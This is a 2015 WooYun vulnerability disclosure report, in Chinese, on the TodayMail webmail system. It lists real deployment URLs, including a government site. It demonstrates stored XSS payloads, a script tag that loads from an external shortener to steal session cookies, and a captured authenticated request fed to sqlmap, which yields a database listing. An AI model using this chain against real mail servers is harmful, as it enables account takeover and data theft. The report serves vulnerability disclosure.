当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2015-0125468

漏洞标题:时代互联TodayMail系统xss盲打及sql注入(官方demo复现)

相关厂商:广东时代互联科技有限公司

漏洞作者: 黑暗游侠

提交时间:2015-07-09 10:05

修复时间:2015-10-12 10:07

公开时间:2015-10-12 10:07

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:漏洞已经通知厂商但是厂商忽略漏洞

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:


漏洞详情

披露状态:

2015-07-09: 细节已通知厂商并且等待厂商处理中
2015-07-14: 厂商主动忽略漏洞,细节向第三方安全合作伙伴开放
2015-09-07: 细节向核心白帽子及相关领域专家公开
2015-09-17: 细节向普通白帽子公开
2015-09-27: 细节向实习白帽子公开
2015-10-12: 细节向公众公开

简要描述:

时代互联TodayMail系统xss盲打及sql注入(官方demo复现)注入需要登陆

详细说明:

时代互联旗下的邮件系统存在通用注入, 时代互联官网:now.cn 涉及大量网站,包括政府站点,使用量绝对是海量级别的:

http://mail.wfq.gov.cn/webmail/login.php?Cmd=login 
http://mail.totalfitness.com.cn/webmail/login.php?Cmd=login
http://mail.qtc.org.cn/webmail/login.php?Cmd=login
http://mail.yphb.com.cn/webmail/login.php?Cmd=login
http://mail.power-ring.cn/webmail/login.php?Cmd=login
-----------


这次发的是组合拳进行SQL注入
经过反复测试,只有该唯一办法组合可以进行SQL注入
注入产生在对query处的关键字查询过滤不严,但是该功能只对登陆后开放访问权限
登陆验证phpsessid,无法伪造
登陆用的邮箱和密码均为管理员自己设置的账号和密码
而密码强度呢?是几乎不可能破解的
我拿了的一个邮箱管理员的账号,可以来看一下设置:

34.png


(密码为6个以上字符,只能由字母加数字,或者字母加 "_" , "-" , ".",或者数字加"_" , "-" , "." 组成)


密码强度很大,fuzzing是几乎很难做到的,虽然登陆验证码的设置不强
再来看到另一处常规突破口,忘记密码

35.png


如图,很遗憾,功能封锁。
已经没有其他办法绕过登陆了,那么只剩下----------
是的,没错 :

Xss/Csrf


拿到了用户的cookie,甚至只需要phpsessid即可,就可以登陆该邮箱,然后利用SQL缺陷进行注入攻击
经过测试,该邮件系统标题和内容正文处均存在store xss漏洞
测试用poc:

<svg/onload=alert(1) />
<fremeser onload=alert(1) />


和标题一样,官方demo复现!
==========================================================================

mail.now.cn


登陆处302到某台cdn

http://cdn621.todayisp.net


那就在这里做测试吧
邮箱收集的过程就不再多说,官网、html标记都可以找到
下面写一封邮件
标题或正文插入:

<script src=http://is.gd/FBslp6></script>


没过多久就有了结果
来看:

36.png


成功获取到了cookie,也就拿到了phpsessid
怎么用呢?
#组合拳,SQL注入(注:登陆后多处未过滤存在注入)
将盲打到的用户cookie放入以下data包中:

GET /webmail/main/list_search.php?query=123*&=%E6%90%9C%E7%B4%A2%E9%82%AE%E4%BB%B6 HTTP/1.1
Accept: text/html, application/xhtml+xml, */*
Referer: http://cdn621.todayisp.net/webmail/main/default.php
Accept-Language: en-US
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko
Accept-Encoding: gzip, deflate
Host: cdn621.todayisp.net
Proxy-Connection: Keep-Alive
Cookie: CFG_LANGUAGE=gb; PHPSESSID=*********; LoginDomain=******; cookie_name=*********


保存为1.txt (123*为未过滤注入处)
接着使用sqlmap:

sqlmap -r c:\1.txt --dbs


直接获得注入结果:

37.png


38.png


全部数据库:

available databases [109]:
[*] information_schema
[*] MailFailRecord
[*] MailTemp-1
[*] MailTemp00
[*] MailTemp01
[*] MailTemp02
[*] MailTemp03
[*] MailTemp04
[*] MailTemp05
[*] MailTemp06
[*] MailTemp07
[*] MailTemp08
[*] MailTemp09
[*] MailTemp10
[*] MailTemp11
[*] MailTemp12
[*] MailTemp13
[*] MailTemp14
[*] MailTemp15
[*] MailTemp16
[*] MailTemp17
[*] MailTemp18
[*] MailTemp19
[*] MailTemp20
[*] MailTemp21
[*] MailTemp22
[*] MailTemp23
[*] MailTemp24
[*] MailTemp25
[*] MailTemp26
[*] MailTemp27
[*] MailTemp28
[*] MailTemp29
[*] MailTemp30
[*] MailTemp31
[*] MailTemp32
[*] MailTemp33
[*] MailTemp34
[*] MailTemp35
[*] MailTemp36
[*] MailTemp37
[*] MailTemp38
[*] MailTemp39
[*] MailTemp40
[*] MailTemp41
[*] MailTemp42
[*] MailTemp43
[*] MailTemp44
[*] MailTemp45
[*] MailTemp46
[*] MailTemp47
[*] MailTemp48
[*] MailTemp49
[*] MailTemp50
[*] MailTemp51
[*] MailTemp52
[*] MailTemp53
[*] MailTemp54
[*] MailTemp55
[*] MailTemp56
[*] MailTemp57
[*] MailTemp58
[*] MailTemp59
[*] MailTemp60
[*] MailTemp61
[*] MailTemp62
[*] MailTemp63
[*] MailTemp64
[*] MailTemp65
[*] MailTemp66
[*] MailTemp67
[*] MailTemp68
[*] MailTemp69
[*] MailTemp70
[*] MailTemp71
[*] MailTemp72
[*] MailTemp73
[*] MailTemp74
[*] MailTemp75
[*] MailTemp76
[*] MailTemp77
[*] MailTemp78
[*] MailTemp79
[*] MailTemp80
[*] MailTemp81
[*] MailTemp82
[*] MailTemp83
[*] MailTemp84
[*] MailTemp85
[*] MailTemp86
[*] MailTemp87
[*] MailTemp88
[*] MailTemp89
[*] MailTemp90
[*] MailTemp91
[*] MailTemp92
[*] MailTemp93
[*] MailTemp94
[*] MailTemp95
[*] MailTemp96
[*] MailTemp97
[*] MailTemp98
[*] MailTemp99
[*] mysql
[*] NewTodaymail
[*] proftpd
[*] test
[*] todaymail
[*] todaymail20101208


漏洞证明:

37.png


38.png

修复方案:

安全是一个整体

版权声明:转载请注明来源 黑暗游侠@乌云


漏洞回应

厂商回应:

危害等级:无影响厂商忽略

忽略时间:2015-10-12 10:07

厂商回复:

漏洞Rank:15 (WooYun评价)

最新状态:

暂无